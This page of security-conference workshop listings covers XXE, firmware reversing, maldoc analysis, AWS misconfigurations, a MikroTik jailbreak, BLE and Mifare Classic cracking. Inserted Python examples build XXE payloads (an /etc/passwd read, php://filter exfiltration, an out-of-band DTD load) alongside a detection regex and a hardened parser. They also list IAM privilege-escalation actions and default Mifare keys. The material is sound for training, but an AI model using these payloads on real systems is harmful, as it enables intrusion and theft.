Most pentesters are familiar with XXE vulnerabilities. This workshop's objective is to sharpen their knowledge and skills in hands-on exercises. These exercises set up realistic scenarios with particular constraints, the same obstacles participants are likely to meet in a business environment.
When conducting a penetration test of a web application, knowledge of technology-specific caveats becomes crucial; knowing the basics of a vulnerability class is often not enough to be effective. In this workshop, the latest XML eXternal Entity (XXE) and XML-related attack vectors will be presented. XXE affects any XML parser that resolves external entities, and it gained visibility with its introduction to the OWASP Top 10 2017 (A4). You might be able to detect the classic patterns, but can you convert the vulnerability into a directory listing, binary file exfiltration, a file write or remote code execution?
The focus of this workshop will be presenting various techniques and exploitation tricks for both PHP and Java applications. Four applications will be at your disposal to test your skills. For every exercise, sample payloads will be given so that attendees save some time.
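A worked example of the conversion the abstract asks about, added for this listing and not part of the workshop's sample payloads: one function builds the classic file read, the Java directory listing (a file:// URL ending in a slash), the PHP php://filter base64 wrapper for binary files and the out-of-band parameter-entity variant, and safe_parse shows the defender's side, an expat parser that refuses any DOCTYPE or entity declaration before anything can be resolved. The <order> document, the target paths and the attacker DTD URL are assumptions made for the example.

```python
"""XXE payloads for the tricks named above, and a parser that refuses them.

Added example for this listing, not part of the workshop material.  The
target paths (/etc/passwd, /etc/) and the attacker DTD URL are illustrative;
the <order><id>..</id></order> document is a constructed stand-in for
whatever XML the tested application actually accepts.
"""
import re
import xml.parsers.expat

TEMPLATE = '<?xml version="1.0"?>\n{doctype}<order><id>{body}</id></order>'


def build_payload(technique: str, target: str) -> str:
    """Return one XXE payload.

    classic   -- the textbook external entity read (target is a file path)
    javadir   -- the same entity pointing at a directory: the JDK's file:
                 handler returns a directory listing when the path ends in /
    phpfilter -- PHP's php://filter wrapper base64-encodes the target, so a
                 binary or XML-breaking file survives being inlined
    oob       -- a parameter entity that loads an attacker-hosted DTD (target
                 is its URL); that DTD, not shown here, carries the data out
    """
    if technique == "classic":
        dtd = f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file://{target}">]>\n'
        return TEMPLATE.format(doctype=dtd, body="&xxe;")
    if technique == "javadir":
        path = target if target.endswith("/") else target + "/"
        dtd = f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        return TEMPLATE.format(doctype=dtd, body="&xxe;")
    if technique == "phpfilter":
        dtd = ('<!DOCTYPE order [<!ENTITY xxe SYSTEM '
               f'"php://filter/convert.base64-encode/resource={target}">]>\n')
        return TEMPLATE.format(doctype=dtd, body="&xxe;")
    if technique == "oob":
        dtd = f'<!DOCTYPE order [<!ENTITY % remote SYSTEM "{target}"> %remote;]>\n'
        return TEMPLATE.format(doctype=dtd, body="probe")
    raise ValueError(f"unknown technique {technique!r}")


# Triage heuristic for proxy logs: legitimate clients rarely send a DOCTYPE.
XXE_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY|php://filter|file:///", re.I)


def looks_like_xxe(xml_text: str) -> bool:
    return XXE_MARKERS.search(xml_text) is not None


def safe_parse(xml_text: str) -> dict:
    """Parse untrusted XML with expat, rejecting any DOCTYPE or entity
    declaration before anything can be resolved.  Returns {tag: text}.
    Raises ValueError on XXE-style input."""
    parser = xml.parsers.expat.ParserCreate()
    text, stack = {}, []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError(f"DOCTYPE {name!r} rejected: untrusted XML may not declare entities")

    def reject_entity(name, *rest):
        raise ValueError(f"entity declaration {name!r} rejected")

    def start(tag, attrs):
        stack.append(tag)
        text.setdefault(tag, "")

    def chars(data):
        if stack:
            text[stack[-1]] += data

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return text


if __name__ == "__main__":
    for technique in ("classic", "javadir", "phpfilter", "oob"):
        print(build_payload(technique, "/etc/passwd"))
    print(safe_parse('<order><id>42</id></order>'))
```

The Java directory listing and the PHP wrapper are where a "classic pattern" becomes the file listing and binary exfiltration the abstract mentions; the parser side matters because most XXE fixes are a single parser feature flag, and rejecting the DOCTYPE outright is the one setting that holds across parsers.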
Requirements for participants:
- HTTP proxy such as Burp
- Ruby/Python installed to run the sample scripts provided
- Private server (optional but recommended). I always provided access to a limited VPS for participants who need it.
June 19 pm & June 20 pm - Room 34
There is a lot of intro-level material on using radare2. I wanted to do an intermediate-level how-to. I have also previously looked at the open firmware, and since it has an open-source component it is a good place to start, both for 1) not violating any terms and 2) fact-checking the reverse engineering work.
OpenXC builds its firmware, for both the open and proprietary builds, from JSON data structures that define the CAN signals. These definitions are akin to CAN database (.dbc) files. Reverse engineering the open OpenXC builds (as an educational exercise) reveals that it is a straightforward matter to identify and extract the CAN signal definitions from the binary. Attendees will learn: what .dbc files are; how to load raw binaries (ARM in particular) into r2; how to pretty-print data structures using r2. Machine code will be shown throughout with the free radare2 RE tool.
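As an added example (not OpenXC code and not r2 output), the same extraction done in Python: a struct layout stands in for the signal definition record, a plausibility filter and a sliding word-aligned scan carve the table out of a raw image the way you would before pretty-printing it with r2's pf, and the record's decode method applies the .dbc semantics (start bit, length, factor, offset) to a frame. The record layout, the flash base address and the firmware bytes are all hypothetical and constructed here; against a real build the layout has to be read off the open source first.

```python
"""Carving CAN signal definitions out of a raw firmware image and decoding a frame with them.

Added example for this listing, not OpenXC code and not radare2 output.  The
record layout SIGNAL_FMT, the flash base address and the sample image are all
hypothetical; the real OpenXC struct has to be read off the open build (or its
source) first, and the scan below then only has to be told the layout.
"""
import math
import struct
from dataclasses import dataclass

FLASH_BASE = 0x08000000          # hypothetical load address of the image
FLASH_SIZE = 0x100000            # hypothetical size; pointers must land inside

# Hypothetical little-endian record: CAN id, start bit, bit length, 2 pad
# bytes, float factor, float offset, pointer to the signal's name string.
SIGNAL_FMT = "<IBBxxffI"
SIGNAL_SIZE = struct.calcsize(SIGNAL_FMT)   # 20 bytes


@dataclass
class CanSignalDef:
    message_id: int
    start_bit: int
    bit_length: int
    factor: float
    offset: float
    name_ptr: int

    def decode(self, payload: bytes) -> float:
        """DBC-style little-endian (Intel) extraction: physical = raw * factor + offset."""
        raw = int.from_bytes(payload, "little") >> self.start_bit
        raw &= (1 << self.bit_length) - 1
        return raw * self.factor + self.offset

    def plausible(self) -> bool:
        """Cheap sanity filter that separates real records from random words."""
        return (0 < self.bit_length <= 64
                and self.start_bit + self.bit_length <= 64
                and self.message_id <= 0x1FFFFFFF            # 11- or 29-bit CAN id
                and math.isfinite(self.factor) and 1e-6 <= abs(self.factor) <= 1e6
                and math.isfinite(self.offset) and abs(self.offset) <= 1e6
                and FLASH_BASE <= self.name_ptr < FLASH_BASE + FLASH_SIZE)


def name_at(image: bytes, ptr: int) -> str:
    """Follow a pointer into the image and read the NUL-terminated string there."""
    start = ptr - FLASH_BASE
    return image[start:image.index(b"\x00", start)].decode("ascii")


def carve_signal_table(image: bytes) -> list:
    """Slide a word-aligned window over the image and keep runs of at least two
    consecutive plausible records, which is what a static table looks like."""
    hits = [(off, CanSignalDef(*struct.unpack_from(SIGNAL_FMT, image, off)))
            for off in range(0, len(image) - SIGNAL_SIZE + 1, 4)]
    hits = [h for h in hits if h[1].plausible()]
    runs, current = [], []
    for hit in hits:
        if current and hit[0] != current[-1][0] + SIGNAL_SIZE:
            runs.append(current)
            current = []
        current.append(hit)
    runs.append(current)
    return [hit for run in runs if len(run) >= 2 for hit in run]


def describe(image: bytes, off: int, sig: CanSignalDef) -> str:
    """One line per record, in the spirit of r2's pf output."""
    return (f"0x{off:08x}  id=0x{sig.message_id:03x}  bits={sig.start_bit}+{sig.bit_length}"
            f"  factor={sig.factor:g}  offset={sig.offset:g}  name={name_at(image, sig.name_ptr)}")


def build_sample_image() -> bytes:
    """Constructed firmware fragment: filler, a three-record table, padding, strings."""
    names = b"EngineSpeed\x00VehicleSpeed\x00Gear\x00"
    table_off = 32
    names_off = table_off + 3 * SIGNAL_SIZE + 16
    ptr = {n: FLASH_BASE + names_off + names.index(n)
           for n in (b"EngineSpeed", b"VehicleSpeed", b"Gear")}
    table = b"".join(struct.pack(SIGNAL_FMT, *rec) for rec in (
        (0x0C9, 8, 16, 0.25, -100.0, ptr[b"EngineSpeed"]),
        (0x3E9, 0, 8, 1.0, 0.0, ptr[b"VehicleSpeed"]),
        (0x3E9, 24, 12, 0.0625, 0.0, ptr[b"Gear"]),
    ))
    return b"\xff" * table_off + table + b"\x00" * 16 + names


if __name__ == "__main__":
    image = build_sample_image()
    for off, sig in carve_signal_table(image):
        print(describe(image, off, sig))
    rpm = carve_signal_table(image)[0][1]
    print("EngineSpeed from frame 00 00 04 00 ..:", rpm.decode(bytes.fromhex("0000040000000000")))
```

The plausibility filter is what does the work: on its own a 20-byte window matches all over a binary, but a CAN id that fits in 29 bits, bit ranges that stay inside an 8-byte frame, a sane factor and a pointer that lands in flash leave only the real table, and requiring two consecutive records removes the last false positives. Once the offsets are known the same layout can be handed to r2 as a pf format string.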
June 19 am - Room 34
June 19 pm - Room 7
June 20 am - Room 34
Most cyber attacks and advanced persistent threats (APTs) target users and use malicious documents to compromise victim machines. This workshop will give you a deep understanding of this kind of attack, and afterwards you will be able to hunt threat actors who use malicious documents.
In recent cyber attacks, scams and frauds, social engineering was a key attack vector for cyber criminals. In most social engineering tricks the threat actor gets the victim to open a document in order to compromise them. This workshop is unique because at the end of it you will be able to analyse infected documents, such as MS Office files or PDFs, and extract valuable information: IP addresses, strings, C2 communications, malware type and more. This workshop will cover the following topics:
- Spreading techniques
- Attack scenarios
- MS-Office structures
- PDF structures
- MS-office Static analysis (Hands-on lab)
- PDF Static analysis (Hands-on lab)
- MS-Office Dynamic analysis (Hands-on lab)
- PDF Dynamic analysis (Hands-on lab)
- Workshop exercises
In this workshop we will cover all the core concepts about APTs, attack scenarios, document structure, the importance of document malware analysis, and static and dynamic techniques. The instructor will share his experience in the field of document analysis to help you when doing forensics and analysis on malicious documents. We will use REMnux, a Linux distribution built for malware analysis; for more information see https://remnux.org/ .
All tools that will be used during the workshop:
- ExifTool
- OfficeMalScanner
- officeparser
- oledump
- oleid
- olevba
- ViperMonkey
- Lazy Office Analyzer
- FakeNet
- pdfid
- pdfinfo
- pdf-parser
- pdfextract
- peepdf
- pdftk
- PDF Stream Dumper
- pyew
- Malzilla
June 19 & June 20 am - Room 33
This workshop shows how tiny misconfigurations in AWS can lead to a complete takeover of cloud resources. The audience will learn how to detect and exploit the misconfigurations as well as how to defend against such attacks. The workshop consists of two parts with hands-on, scenario-based labs. The first part focuses on a privilege escalation scenario: from a small vulnerability in a web application to administrator in AWS. The second part is about finding and exploiting issues related to the AWS S3 service: how to detect a company's resources in the cloud and how to automatically scan them for valuable information.
More and more companies decide to migrate their services to the cloud, and the majority of them choose Amazon Web Services. While DevOps teams are focused on deploying stable environments, security is not their highest priority. Many are not aware that small mistakes in configuring AWS can cost a huge amount of money or even put the company out of business.
The workshop is focused on the two most common misconfigurations in AWS: improper permissions and data leaks. During the first part you will learn how to escalate your privileges using the AWS exploitation framework Pacu. Then you will practice with tools that detect S3 misconfigurations and learn how to automatically scan leaked content for keys and passwords using DumpsterDiver. Finally, you will go through the same scenarios from the defender's perspective, focused on hardening your AWS resources.
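An added example for the two misconfigurations the workshop targets, not Pacu or DumpsterDiver code and not an AWS API call: it reads IAM policy documents and reports the permissions that let a principal grant itself more rights (the set a privilege-escalation scan enumerates), plus a check for an S3 bucket policy that grants read access to everyone. The policies are constructed; explicit Denies, SCPs and permission boundaries are not evaluated, so hits are leads to verify, not proof.

```python
"""Spotting privilege-escalation paths and public S3 buckets in policy documents.

Added example for this listing; it is not Pacu or DumpsterDiver code and calls no
AWS API.  The policies are constructed inline.  The action list is the commonly
documented set of IAM permissions that let a principal grant itself more rights;
the PassRole combinations are services where passing a privileged role to
something you control amounts to assuming it.  Explicit Deny statements, SCPs
and permission boundaries are not evaluated, so treat hits as leads, not proof.
"""
import fnmatch

PRIVESC_ACTIONS = {
    "iam:CreatePolicyVersion": "rewrite an attached policy as its new default version",
    "iam:SetDefaultPolicyVersion": "flip an attached policy to an older, broader version",
    "iam:AttachUserPolicy": "attach AdministratorAccess to your own user",
    "iam:AttachGroupPolicy": "attach a managed policy to a group you are in",
    "iam:AttachRolePolicy": "attach a managed policy to a role you can assume",
    "iam:PutUserPolicy": "write an inline policy on your own user",
    "iam:PutGroupPolicy": "write an inline policy on a group you are in",
    "iam:PutRolePolicy": "write an inline policy on a role you can assume",
    "iam:AddUserToGroup": "join a more privileged group",
    "iam:CreateAccessKey": "mint keys for a more privileged user",
    "iam:CreateLoginProfile": "set a console password for a user without one",
    "iam:UpdateLoginProfile": "reset another user's console password",
    "iam:UpdateAssumeRolePolicy": "let yourself assume any role",
}
PASSROLE_COMBOS = {
    "lambda:CreateFunction": "run code under a passed role",
    "ec2:RunInstances": "boot an instance with a passed instance profile",
    "glue:CreateDevEndpoint": "get a shell on a dev endpoint with a passed role",
    "cloudformation:CreateStack": "have CloudFormation create resources as a passed role",
}


def allowed_actions(policy: dict) -> list:
    """Flatten Allow statements into (action pattern, resource) pairs, lower-cased
    because IAM matches action names case-insensitively."""
    pairs = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow" or "Action" not in st:
            continue
        actions = st["Action"] if isinstance(st["Action"], list) else [st["Action"]]
        resources = st.get("Resource", "*")
        resources = resources if isinstance(resources, list) else [resources]
        pairs += [(a.lower(), r) for a in actions for r in resources]
    return pairs


def grants(policy: dict, action: str) -> bool:
    """Wildcards in the policy (iam:*, iam:Create*, *) count as granting the action."""
    return any(fnmatch.fnmatchcase(action.lower(), pat) for pat, _ in allowed_actions(policy))


def find_privesc(policy: dict) -> list:
    """Return human-readable findings for every known escalation path the policy allows."""
    findings = [f"{a}: {why}" for a, why in PRIVESC_ACTIONS.items() if grants(policy, a)]
    if grants(policy, "iam:PassRole"):
        findings += [f"iam:PassRole + {a}: {why}" for a, why in PASSROLE_COMBOS.items()
                     if grants(policy, a)]
    return findings


def is_public_bucket_policy(policy: dict) -> bool:
    """True when anyone on the internet is allowed to read or list the bucket."""
    for st in policy.get("Statement", []):
        principal = st.get("Principal")
        anyone = principal == "*" or (isinstance(principal, dict) and principal.get("AWS") == "*")
        actions = st.get("Action", [])
        actions = actions if isinstance(actions, list) else [actions]
        readish = any(fnmatch.fnmatchcase(x, a.lower()) for a in actions
                      for x in ("s3:getobject", "s3:listbucket"))
        if st.get("Effect") == "Allow" and anyone and readish and "Condition" not in st:
            return True
    return False


# Constructed policies: what the leaked web-app credentials in part one might carry.
WEB_APP_ROLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": "arn:aws:s3:::app-assets/*"},
    {"Effect": "Allow", "Action": "iam:CreatePolicyVersion", "Resource": "*"}]}
READ_ONLY_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*"], "Resource": "*"}]}
LAMBDA_DEPLOYER_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"], "Resource": "*"}]}
PUBLIC_BUCKET_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::backups/*"}]}
LOCKED_BUCKET_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/backup"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::backups/*"}]}

if __name__ == "__main__":
    for name, pol in (("web app", WEB_APP_ROLE_POLICY), ("read only", READ_ONLY_POLICY),
                      ("lambda deployer", LAMBDA_DEPLOYER_POLICY)):
        print(name, "->", find_privesc(pol) or "no known escalation path")
    print("backups bucket public:", is_public_bucket_policy(PUBLIC_BUCKET_POLICY))
```

The web-app policy looks harmless at a glance (read access to one bucket), yet the single iam:CreatePolicyVersion line is the whole privilege-escalation scenario: a new default version of any attached policy can say Allow *:*. That is why the defender pass should be run over every policy a workload can reach, not only over the obviously administrative ones.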
June 19 & June 20 pm - Room 32
Recent years have seen a flood of novel wireless exploits, with exploitation moving beyond 802.11 into more obscure standard and proprietary protocols. RF exploration and the use of SDR to exploit the world we live in, full of interconnected devices, is changing the game for both offense and defense.
What do the Dallas tornado siren attack, hacked electric skateboards and insecure smart door locks have in common? Vulnerable wireless protocols. The number of IoT devices is growing at an alarming rate, and many of these devices go unnoticed. The problem is that the software used by many of them lacks basic security measures that we take for granted in regular computer software. Furthermore, security advisories are almost non-existent for IoT.
June 19 pm - Room 69
June 20 pm - Room 33
In this 45-minute workshop you will learn how to jailbreak a MikroTik router, access its internals, and reverse engineer the firmware of these versatile IoT devices. Participants will be provided with virtual machines, and a limited number of physical devices will be available as well.
MikroTik, one of the fastest-growing networking equipment companies, ships RouterOS on most of its products, from home routers to top-tier ones.
In this workshop we will work with free and open-source toolsets to kickstart your reverse engineering of RouterOS. All audience levels are welcome: we will start by using simple, pre-made scripts to jailbreak the device and progress to more complicated topics, such as the NPK and supout.rif file formats and reverse engineering their code.
Please bring your own laptop and download VirtualBox plus a pre-made virtual machine from:
Most of the tools are available on: https://github.com/0ki/mikrotik-tools
June 19 am & June 20 am - Room 7
You will learn how to create your own BLE device using inexpensive hardware, and how to interact with it from your laptop or mobile phone. After the workshop you will be able to try more advanced topics (e.g. sniffing and attacking your device) using the provided "homework" materials.
Bluetooth Low Energy (Bluetooth Smart, introduced with Bluetooth 4) is one of the most common and fastest-growing IoT technologies. Unfortunately, the prevalence of the technology does not come with security: alarming vulnerabilities in BLE smart locks, medical devices and banking tokens are revealed day by day. And yet the knowledge of how to assess them comprehensively seems very uncommon. In this workshop you will get familiar with the very basics of BLE. We will work on a dedicated, readily available BLE device, an nRF devkit. You will step into the role of an embedded developer and learn how to program and flash it yourself, using a special web interface and ready-made templates. Next, we will interact with it from the Linux command line and a free mobile application. More advanced topics (including sniffing, intercepting and attacking) will be left for you as homework.
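An added example, not nRF SDK or bluetoothctl code: a decoder for the advertising data your device broadcasts, which is the first thing you see from the laptop (or, later, from a sniffer) before connecting and reading characteristics. The advertisement is constructed for a device named nRF_Lock exposing the Battery Service; the length-type-value walk is the standard AD structure format and applies to any BLE advertiser.

```python
"""Decoding BLE advertising data, the first thing the laptop sees from your device.

Added example for this listing, not nRF SDK or bluetoothctl code.  SAMPLE_ADV is
constructed: the 31-byte-max payload a scan or a sniffer hands you for a device
advertising as "nRF_Lock" with the Battery Service (0x180F).
"""
AD_TYPES = {0x01: "flags", 0x02: "uuid16_incomplete", 0x03: "uuid16_complete",
            0x08: "name_short", 0x09: "name_complete", 0x0A: "tx_power",
            0x16: "service_data", 0xFF: "manufacturer"}
FLAG_BITS = {0: "LE Limited Discoverable", 1: "LE General Discoverable",
             2: "BR/EDR Not Supported"}


def parse_adv(data: bytes) -> dict:
    """Walk the length/type/value AD structures.  A length that overruns the
    packet is malformed: it is reported and parsing stops rather than reading
    past the end, which is the bug class a fuzzed advertisement would hit."""
    out, i = {}, 0
    while i < len(data):
        length = data[i]
        if length == 0:                      # zero padding fills the rest
            break
        if i + 1 + length > len(data):
            out["malformed"] = f"AD length {length} at offset {i} overruns packet"
            break
        ad_type, value = data[i + 1], data[i + 2:i + 1 + length]
        kind = AD_TYPES.get(ad_type, f"type_0x{ad_type:02x}")
        if kind == "flags":
            out["flags"] = [name for bit, name in FLAG_BITS.items()
                            if value and value[0] >> bit & 1]
        elif kind in ("uuid16_complete", "uuid16_incomplete"):
            out["services"] = [f"0x{int.from_bytes(value[j:j + 2], 'little'):04X}"
                               for j in range(0, len(value) - 1, 2)]
        elif kind in ("name_complete", "name_short"):
            out["name"] = value.decode("utf-8", "replace")
        elif kind == "tx_power":
            out["tx_power_dbm"] = int.from_bytes(value[:1], "little", signed=True)
        elif kind == "manufacturer":
            out["company_id"] = int.from_bytes(value[:2], "little")
            out["manufacturer_data"] = value[2:].hex()
        else:
            out[kind] = value.hex()
        i += 1 + length
    return out


# Constructed: flags 0x06, complete 16-bit UUID list [0x180F], name, tx power 0 dBm.
SAMPLE_ADV = bytes.fromhex("020106" "03030f18" "0909" + b"nRF_Lock".hex() + "020a00")

if __name__ == "__main__":
    for key, value in parse_adv(SAMPLE_ADV).items():
        print(f"{key}: {value}")
```

Flags 0x06 (general discoverable, BR/EDR not supported) is what a typical devkit template advertises; if you see an advertised name or service here, that is what the mobile app lists before you have connected, and it is the same bytes a sniffer captures for the homework.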
- laptop capable of running Kali Linux in VM, and at least one USB port
- smartphone (preferably Android)
Despite several vulnerabilities and upgrade advisories published years ago, Mifare Classic is still surprisingly often used for access control, bus tickets, loyalty cards and e-wallets.
During this workshop you will learn how to crack and clone it using just a mobile phone or inexpensive hardware.
We will cover:
- Mifare Classic introduction: keys, security, data sectors, blocks
- brute-forcing the common dictionary keys using Mifare Classic Tool on a mobile phone
- cracking Mifare Classic and Mifare Classic EV1 with the nested, darkside and hardnested attacks (libnfc with a PN532 reader)
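An added example covering the introduction and the dictionary step above (not Mifare Classic Tool or libnfc code): it parses a sector trailer, decodes the access bits including their inverted-copy integrity check, tells you what each key may do with each block, flags keys from a short built-in default list, and points out when key B is readable and therefore useless for authentication. The trailers are constructed; the layout and condition tables follow the NXP MF1S50 datasheet.

```python
"""Decoding a Mifare Classic sector trailer: keys, access bits, and which key may do what.

Added example for this listing, not Mifare Classic Tool or libnfc code.  The
trailer layout and the two condition tables follow the NXP MF1S50 datasheet
(bytes 0-5 key A, 6-8 access bits, 9 user byte, 10-15 key B); the sample
trailers and the short default-key list are constructed here.
"""
DEFAULT_KEYS = {  # a few of the well-known keys every dictionary attack tries first
    "ffffffffffff": "factory transport key",
    "000000000000": "all zeros",
    "a0a1a2a3a4a5": "MAD (Mifare Application Directory) key A",
    "d3f7d3f7d3f7": "NDEF public key",
}
# (C1, C2, C3) -> (read, write, increment, decrement/transfer/restore) for data blocks
DATA_BLOCK_RULES = {
    (0, 0, 0): ("A|B", "A|B", "A|B", "A|B"),
    (0, 1, 0): ("A|B", "never", "never", "never"),
    (1, 0, 0): ("A|B", "B", "never", "never"),
    (1, 1, 0): ("A|B", "B", "B", "A|B"),
    (0, 0, 1): ("A|B", "never", "never", "A|B"),
    (0, 1, 1): ("B", "B", "never", "never"),
    (1, 0, 1): ("B", "never", "never", "never"),
    (1, 1, 1): ("never", "never", "never", "never"),
}
# (C1, C2, C3) -> (keyA read, keyA write, bits read, bits write, keyB read, keyB write)
TRAILER_RULES = {
    (0, 0, 0): ("never", "A", "A", "never", "A", "A"),
    (0, 1, 0): ("never", "never", "A", "never", "A", "never"),
    (1, 0, 0): ("never", "B", "A|B", "never", "never", "B"),
    (1, 1, 0): ("never", "never", "A|B", "never", "never", "never"),
    (0, 0, 1): ("never", "A", "A", "A", "A", "A"),
    (0, 1, 1): ("never", "B", "A|B", "B", "never", "B"),
    (1, 0, 1): ("never", "never", "A|B", "B", "never", "never"),
    (1, 1, 1): ("never", "never", "A|B", "never", "never", "never"),
}


def decode_access_bits(b6: int, b7: int, b8: int) -> list:
    """Return [(C1, C2, C3) for block 0..3].  Every bit is stored twice, once
    inverted; a mismatch means a corrupt trailer, which bricks the sector."""
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    if (~b6 & 0xF) != c1 or ((~b6 >> 4) & 0xF) != c2 or (~b7 & 0xF) != c3:
        raise ValueError("access bits fail their inverted-copy check")
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]


def parse_trailer(block: bytes) -> dict:
    if len(block) != 16:
        raise ValueError("a Mifare Classic block is 16 bytes")
    access = decode_access_bits(block[6], block[7], block[8])
    key_a, key_b = block[:6].hex(), block[10:].hex()
    return {
        "key_a": key_a, "key_b": key_b, "user_byte": block[9], "access": access,
        "default_key_a": DEFAULT_KEYS.get(key_a), "default_key_b": DEFAULT_KEYS.get(key_b),
        # if key B can be read it is just data to the card and cannot authenticate
        "key_b_usable_for_auth": TRAILER_RULES[access[3]][4] == "never",
    }


def describe_sector(block: bytes) -> list:
    """One line per block, in a form you can compare against an MCT dump."""
    t = parse_trailer(block)
    lines = []
    for n in range(3):
        r, w, inc, dec = DATA_BLOCK_RULES[t["access"][n]]
        lines.append(f"block {n}: read {r}, write {w}, increment {inc}, decrement {dec}")
    _, ka_w, ab_r, ab_w, kb_r, kb_w = TRAILER_RULES[t["access"][3]]
    lines.append(f"trailer: keyA write {ka_w}; access bits read {ab_r}, write {ab_w}; "
                 f"keyB read {kb_r}, write {kb_w}")
    lines.append(f"key A {t['key_a']} ({t['default_key_a'] or 'not a default key'}), "
                 f"key B {t['key_b']} ({t['default_key_b'] or 'not a default key'}), "
                 f"key B {'usable' if t['key_b_usable_for_auth'] else 'NOT usable'} for authentication")
    return lines


# Constructed trailers: a card still in transport configuration, and a deployed one.
TRANSPORT_TRAILER = bytes.fromhex("ffffffffffff ff078069 ffffffffffff")
DEPLOYED_TRAILER = bytes.fromhex("a0a1a2a3a4a5 78778869 b0b1b2b3b4b5")

if __name__ == "__main__":
    for name, trailer in (("transport", TRANSPORT_TRAILER), ("deployed", DEPLOYED_TRAILER)):
        print(name)
        for line in describe_sector(trailer):
            print("  " + line)
```

The transport trailer (FF 07 80 69 access bytes) is what a fresh card ships with: data blocks writable with either key and key B readable with key A, so cracking key A gives everything. The deployed trailer is the usual "key B is master" layout, where a dictionary hit on key A only yields read access and the write key has to come from the nested or darkside attack.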
- A laptop capable of running Kali Linux in VM, and at least one USB port.
- Android phone with NFC (NXP NFC chipset, as in most current phones).
- You can bring your own Mifare Classic tag to check its security.
June 19 am & June 20 am - Room 69